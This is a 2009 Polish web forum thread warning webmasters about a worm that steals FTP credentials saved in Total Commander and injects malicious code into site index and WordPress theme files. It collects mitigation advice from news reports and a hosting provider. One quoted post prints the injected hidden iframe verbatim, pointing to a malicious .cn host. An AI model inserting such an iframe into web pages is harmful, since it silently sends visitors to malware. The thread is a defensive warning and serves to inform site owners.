Ogłoszenia - [Problem] UWAGA ROBAK!
arcy - 15-04-2009, 19:08
Temat postu: [Problem] UWAGA ROBAK!
UWAGA! Po sieci grasuje robak, który łączy się z serwerami FTP i infekuje strony internetowe.
| Cytat: |
Szkodnik kradnie hasła z programu Total Commander po czym dodaje ukryte ramki, linki i złośliwy kod do plików index.php, index.html, main.php i wielu innych, które ma w definicjach.
Zagrożone są strony oparte na autorskich oraz popularnych skryptach, np. Wordpress. Użytkownicy tego ostatniego narzędzia mogą znaleźć złośliwy kod w szablonach w katalogu wp-content/themes/ oraz w innych plikach z ustawieniami konfiguracyjnym - ostrzega autor shpyo.net.
Po zainfekowaniu strony dostęp do niej zostaje zablokowany przez osłony sieciowe programów antywirusowych, a także przez wyszukiwarkę Google, która ostrzega o niebezpiecznej stronie.
Aby wyjaśnić sytuację i rozwiać ewentualne wątpliwości Dziennik Internautów skontaktował się z polskim przedstawicielem Total Commandera. Potwierdził on pojawienie się wyjątkowo aktywnego szkodnika, który faktycznie loguje się się na konta FTP i dodaje pewien fragment kodu do plików startowych.
- Jedynym bezpiecznym rozwiązaniem problemu jest usunięcie wirusa poprzez program antywirusowy a następnie zmiana haseł do swoich kont FTP. Problem zostanie rozwiązany w wersji 7.50 gdzie hasła do FTP będą zaszyfrowane algorytmem AES. Do czasu wydania finalnej nowej wersji zalecam niezapisywanie haseł w programie - radzi przedstawiciel programu Total Commander. |
Źródło: http://di.com.pl/news/263..._przez_FTP.html
Mieliśmy ostatnio zgłoszenia, w których do plików dopisywano IFRAME z linkiem typu www.googleads.biz
| Cytat: | Złośliwy kod jest dodawany do wszystkich katalogów na serwerze do plików index.php, index.html, main.php. W samym kodzie źródłowym dołącza się na samym początku strony (przed !Doctype), zaraz po body, na końcu strony (po zamykającym tagu html) i przed ostatnim tagiem zamykającym body. Ponadto jeżeli używasz Wordpressa, to złośliwy kod jest dołączany do szablonów w katalogu wp-content/themes/ a nawet do innych plików z configami. U mnie był to np. wp-includes/default-filters.php
Co?
Dołączany jest niewidoczny iframe, który wygląda tak (oraz różne kombinacje):
Co się dzieje?
Wirus się rozprzestrzenia poprzez wyżej pokazany kod – to raz. Dwa – Google blokuje dostęp do strony przez wyszukiwarkę. Pojawia się komunikat, że „strona może wyrządzić szkody”. |
Źródło: <a href="http://blog.shpyo.net/?newsID=153">http://blog.shpyo.net/?newsID=153</a>
| Robert napisał/a: | | Szybkie rozwiązanie problemu: kontakt z hostingiem, poprosić o logi do ftp, sprawdzić kiedy akcja się zaczęła i poprosić o odtworzenie konta z backupu z dnia wcześniejszego. Wcześniej oczywiście trzeba usunąć paskudztwo z komputera i zmienić hasło do ftp.> |
Proszę uważać - zaktualizować swoje programy antywirusowe i nie przechowywać haseł w Total Commanderze - nie korzystać z opcji zapamiętania hasła!
Szczegółowe informacje o sposobie działania szkodnika znajdziecie na stronie http://www.cert.pl/news/1571
fastlone - 15-04-2009, 19:25
A dotyczy to File Zilli albo innych programów od FTP?
Czy tylko Total Commander?
arcy - 15-04-2009, 19:27
TC - robak najprawdopodobniej pobiera dane do logowania z pliku konfiguracyjnego Total Commandera.
They2 - 15-04-2009, 20:18
fakt
naprawde lubie taki popularny program TC, dawny WC. 
nieoznakowane - 15-04-2009, 20:19
Polecam LINUX-a 
They2 - 15-04-2009, 20:20
| arcy napisał/a: | | TC - wirus najprawdopodobniej pobiera dane do logowania z pliku konfiguracyjnego Total Commandera. |
z 2 plików ktore wiem gdzie to jest,
to w katalogu C:\WINDOWS w rozszerzeniu ini.
arcy - 15-04-2009, 20:33
| nieoznakowane napisał/a: | | Polecam LINUX-a |
Gdyby Linux byłby tak samo popularny jak Windows też miałbyś podobne problemy. Czasy romantycznych hakerów się skończyły - teraz wirusy i trojany to biznes i pieniądze. A na niszowym systemie wiele nie zarobią. Tym bardziej, że ludzie używający Linuxa są zwykle bardziej świadomi kwesti bezpieczeństwa.
| arcy napisał/a: | | Problem zostanie rozwiązany w wersji 7.50 gdzie hasła do FTP będą zaszyfrowane algorytmem AES. |
arcy - 15-04-2009, 20:46
| Cytat: | Złośliwy kod jest dodawany do wszystkich katalogów na serwerze do plików index.php, index.html, main.php. W samym kodzie źródłowym dołącza się na samym początku strony (przed !Doctype), zaraz po body, na końcu strony (po zamykającym tagu html) i przed ostatnim tagiem zamykającym body. Ponadto jeżeli używasz Wordpressa, to złośliwy kod jest dołączany do szablonów w katalogu wp-content/themes/ a nawet do innych plików z configami. U mnie był to np. wp-includes/default-filters.php
Co?
Dołączany jest niewidoczny iframe, który wygląda tak (oraz różne kombinacje):
| Kod: | | <iframe src="http://cheapslotplay.cn/in.cgi?income48" width=1 height=1 style="visibility: hidden"></iframe> |
Co się dzieje?
Wirus się rozprzestrzenia poprzez wyżej pokazany kod – to raz. Dwa – Google blokuje dostęp do strony przez wyszukiwarkę. Pojawia się komunikat, że „strona może wyrządzić szkody”. |
Źródło: <a href="http://blog.shpyo.net/?newsID=153">http://blog.shpyo.net/?newsID=153</a>
| Robert napisał/a: | | Szybkie rozwiązanie problemu: kontakt z hostingiem, poprosić o logi do ftp, sprawdzić kiedy akcja się zaczęła i poprosić o odtworzenie konta z backupu z dnia wcześniejszego. Wcześniej oczywiście trzeba usunąć paskudztwo z komputera i zmienić hasło do ftp.> |
Seba123 - 15-04-2009, 21:03
Filezilla również.
Paszczak000 - 16-04-2009, 07:33
| arcy napisał/a: | | Gdyby Linux byłby tak samo popularny jak Windows też miałbyś podobne problemy. |
Jest bardziej popularny w rozwiązaniach serwerowych (a właśnie takie maszyny opłaca się atakować) i jakoś dalej się trzyma :] Poznaj architekturę systemów typu UNIX, Linux, Windows to zrozumiesz :]
arcy - 16-04-2009, 20:27
| Paszczak000 napisał/a: | | Poznaj architekturę systemów typu UNIX, Linux, Windows to zrozumiesz :] |
Raczej mało prawdopodobne, przynajmniej za tego życia  Jak Bóg da to się zreinkarnuję w postaci Linuksowego serwera Cóż, nie będę polemizował ze specjalistą, bo moja wiedza na te tematy jest o taka malutka Powiem tylko, że mnie Windows pasuje i mimo wielokrotnych prób i przymiarek do RedHata, Mandrivy i Ubuntu, mój XP nadal pozostaje dla mnie najwygodniejszy w codziennym użyciu. Mimo wirusów, trojanów i innego dziadostwa
inwob - 17-04-2009, 16:05
Chyba mojemu koledze to się przyczepiło bo strona zmienila układ ;d
Obniżyła się i cały układ się zepsół:)
They2 - 17-04-2009, 20:43
Już jest dostępna wersja programu TC 7.50 Beta 1
http://www.ghisler.com/750beta.htm
na razie jest to wersja testowa.
arcy - 17-04-2009, 21:37
Bardzo ciekawy post na temat robaka na forum jednego z dostawców usług hostingowych + sporo innych linków -
http://forum.netlook.pl/index.php/topic,308.0.html
| Cytat: | Niestety, codziennie informujemy o takim zagrożeniu przynajmniej 10-20 klientów, którzy używając nieświadomie TC narazili się na ataki w postaci modyfikacji stron WWW i dodania do nich ramek wbudowanych iframe lub skryptów javascript wywołujących zdalnie wirusa.
Mamy 100% pewność co do infekcji która przeprwadzana jest z winy programu Total Commander / Windows Commander, ale także podejrzenia infekcji w przypadku korzystania z innych programów FTP, jeżeli na komputerze ofiary jest zainstalowany wspomniany wirus / koń trojański. Wówczas hasło nawet niezapisane w programie FTP, podczas połączenia, jest przechwytywane i przesyłane do hakerów.
Rozwiązniem problemu jest:
1. korzystanie tylko z aktualnych, bezpiecznych programów FTP typu Filezilla lub CuteFTP
2. systematyczne (codzienne) skanowanie komputera programami antywirusowymi
3. niezapisywanie haseł w programach FTP lub innych niezabezpieczonych formach na komputerze
4. korzystanie z różnych haseł dostępu do różnych usług / serwerów
5. bezpieczeństwo sieci internetowej z której korzyta użytkownik (dotyczy szczególnie sieci lokalnych, w których z jednego łącza korzysta wiele komputerów - wówczas na łączu może być zainstalowany koń trojański do nasłuch haseł)
Nasze serwery mają zaimplementowane różnego rodzaju systemy wczesnego ostrzegania przed takimi atakami. Ataki dzielą się na kilka form, oto one:
1. ataki przewidywane, w których komputer zombie atakująy serwer FTP ofiary najpierw sprawdza czy serwer działa wgrywając specjalnie spreparowany plik testowy, a następnie od razu go usuwając - taki atak jest wykrywalny, w 80% można go wyeliminować
2. atak przewidywalny, w którym komputer zombie atakuje serwer FTP w celu zainstalowania na nim skryptu do wysyłania mass-mailingów spamowych bez wiedzy i zgody użytkownika - taki atak jest wykrywalny, w 70% można go wyeliminować
3. tzw. atak cichy - komputer zombie atakujący serwer FTP ofiary łączy się jednorazowo z tym serwerem, od razu w sposób autoryzowany, bez żadnych błędów, przy użyciu hasła wcześniej wykradzionego, pobiera a następnie praktycznie w tej samej chwili nadpisuje pliki indexowe lub inne pliki kodu strony - taki atak wykrywalny jest przez system zabezpieczeń dopiero po fakcie wystąpienia, w momencie skanowania już wgranych plików pod kątem obecności złośliwego kodu. Tego ataku nie można wyeliminować, a po wykryciu jedyne co może zrobić użytkownik to poprawić zmodyfikowane pliki aby nie zawierały złośliwego kodu
We wszystkich przypadkach obserwuje się całkowite zaprzestanie ataków na stronę WWW i FTP klienta po tym kiedy zostanie zmienione hasło dostępu do FTP.> |
_mateusz2 - 18-04-2009, 07:48
forum mojego kolegi to zatakowało ma to może być to  HEUR:Trojan.Script.Iframer
|
|
|
